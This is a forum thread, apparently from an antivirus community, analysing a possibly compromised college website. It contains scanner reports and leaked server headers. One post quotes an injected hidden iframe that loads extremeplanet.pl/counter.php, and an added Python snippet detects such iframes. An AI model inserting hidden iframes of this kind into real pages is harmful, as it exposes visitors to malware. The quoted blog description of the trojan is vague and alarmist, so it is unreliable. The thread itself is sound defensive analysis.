What exactly?

see: http://app.webinspector.com/public/reports/24841007
Given as TrojWare.JS.Iframe.GJ
Site vuln for fmcarbscollege dot in see: Custom errors: Fail
Requested URL: htxp://fmcarbscollege.in/fmcarbscollege.in/(S(k4gsld55axnunf45uxnvfe45))/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/trace.axd&foo= | Response URL: htxp://fmcarbscollege.in/fmcarbscollege.in/(S(k4gsld55axnunf45uxnvfe45))/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/trace.axd&foo= | Page title: A potentially dangerous Request.QueryString value was detected from the client (foo=“”). | HTTP status code: 500 (Internal server error) | Response size: 6,690 bytes | Duration: 316 ms
and
Stack trace: Fail
Requested URL: htxp://fmcarbscollege.in/fmcarbscollege.in/(S(k4gsld55axnunf45uxnvfe45))/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/trace.axd&foo= | Response URL: htxp://fmcarbscollege.in/fmcarbscollege.in/(S(k4gsld55axnunf45uxnvfe45))/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/trace.axd&foo= | Page title: A potentially dangerous Request.QueryString value was detected from the client (foo=“”). | HTTP status code: 500 (Internal server error) | Response size: 6,690 bytes | Duration: 316 ms
Excessive headers warning:
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Clickjacking: Warning
Requested URL: htxp://fmcarbscollege.in/ | Response URL: htxp://fmcarbscollege.in/ | Page title: Raja Balwant Singh Management Technical Campus (Formerly FMCA) | HTTP status code: 200 (OK) | Response size: 20,301 bytes | Duration: 1,262 ms
Netcraft halts and reports Phishing, avast does not detect yet!
Very poor WOT web rep: two reds.

pol

General Info Website: http://fmcarbscollege.in Domain: fmcarbscollege.in Scanned IP: 182.50.130.121 Country: Singapore

Seems like an Indian writer down in Singapore…

see: http://zulu.zscaler.com/submission/show/497df73973baed7d558eda04451e19d4-1407255491

suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
fmcarbscollege.in/ie.js benign
[nothing detected] (script) fmcarbscollege.in/ie.js
status: (referer=fmcarbscollege.in/)saved 381 bytes bcbbd9dc3f2ddfeefac0bb8ce0d65d49a79f63e3
info: [decodingLevel=0] found JavaScript
suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
file: bcbbd9dc3f2ddfeefac0bb8ce0d65d49a79f63e3: 381 bytes
file: 8c4a1bc41c4c7048b6ef04c8fa985ba047d265bf: 581 bytes
file: b99ea47d93c6b2585e05b3fc053f4ebc85b4d97d: 587 bytes

I can't pick up anything here:
https://www.virustotal.com/en/file/87d24990b6b7bcc3609e2c67bdcada4021a16749ced95c5dcae896d07c13d0d8/analysis/1409583429/
https://www.virustotal.com/en/file/358c01733613975fcf3c6325b050ad3e76c44524bdbba932ffae3c60513f896d/analysis/1409583443/

Multiple threats detected:
htxp://fmcarbscollege.in/download/form_1.pdf on 08/05/2014 at 16:18 GMT
htxp://fmcarbscollege.in/download/form_2.pdf on 08/05/2014 at 16:18 GMT
fmcarbscollege.in/a7.swf <<SWF:Malware-gen

Avast should be detecting this as JS:Pdfka[trj] and swf:malware-gen

Reported to virus AT avast DOT com

Here I only get a blacklisting history of that site:
http://urlquery.net/report.php?id=1409594630772
Last scan does not give it as malicious. Earlier ones as blacklisted and with malware.

TrojWare.JS.Iframe.GJ belongs to a high level risk Trojan horse which is nasty to damage system files. It is a very crafty virus that can remain on all Windows operating systems. Mostly, the virus is distributed via suspicious links from social networks or spam email attachments. Covered by the rootkit tactic, TrojWare.JS.Iframe.GJ can bypass antivirus programs and remain on the computer deeply.

Virus associated files:

C:\Users[Account Name][Random].dat
%Userprofile%[Random].dat
%Homepath%[Random].dat
%Temp%\random.exe
C:\Windows\Trojan.Agent.Gen[Random].exe
%Windir%\Trojan.Agent.Gen[Random].exe
%Systemroot%\Trojan.Agent.Gen[Random].exe

Quote source: MiTechMate blog

pol

Pol,

I got a reply from avast labs. According to Jan, both the pdf and swf files are benign. Any ideas?

Except for the blacklisting I get no malicious activity from there.
Just check the external links:
-http://www.rediffmailpro.com/mail_pro/mail_pro.html → ‘mail login ’
-http://www.ugc.ac.in/page/videos-regarding-ragging.aspx → ‘more…’
-http://www.ugc.ac.in/ragging.pdf → ’ anti ragging d’

I get a suspicious file here: /default1.aspx
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to ‘extremeplanet.pl’
Offset: 5921 flagged by Quttera’s which avast Webshield flags as infested with JS:Iframe-DOI[Trj].


[[<iframe src="htxp://extremeplanet.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>]]

Same campaign as infested here: http://maldb.com/premiersoftservices.com/

polonus
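
Added example (not part of the thread and not any scanner's own code): a minimal Python check for the pattern reported in the post above, an off-site iframe hidden by CSS or by tiny dimensions. The sample page is constructed around the iframe tag quoted in the post; `find_hidden_iframes` and the other names are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

DEFANGED = re.compile(r"^h(?:xx|tx)p(s?)://", re.I)
HIDING_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def _host(url):
    # Parse defanged schemes (htxp/hxxp) as http so samples stay non-clickable.
    return (urlparse(DEFANGED.sub(r"http\1://", url.strip())).hostname or "").lower()

def _tiny(value, limit=10):
    # True for a small pixel count such as "0", "1px" or "10".
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= limit

class HiddenIframeFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = _host(a.get("src", ""))
        if not host or host == self.page_host or host.endswith("." + self.page_host):
            return  # relative or same-site frame: not an external reference
        reasons = []
        if HIDING_CSS.search(a.get("style", "")):
            reasons.append("css-hidden")
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("tiny-size")
        if reasons:
            self.findings.append({"host": host, "line": self.getpos()[0], "reasons": reasons})

def find_hidden_iframes(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page; only the third iframe is taken from the post above.
SAMPLE = """<html><body>
<iframe src="/banner.html" width="300" height="100"></iframe>
<iframe src="https://video.example.com/embed/1" width="560" height="315"></iframe>
<iframe src="htxp://extremeplanet.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
</body></html>"""
```

Calling `find_hidden_iframes(SAMPLE, "fmcarbscollege.in")` reports only the `extremeplanet.pl` frame; the visible off-site embed and the same-site frame are ignored.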

For an update on this scan, see my scan here of Dec. 13th of the year 2014: https://forum.avast.com/index.php?topic=162966.msg1162365#msg1162365

Damian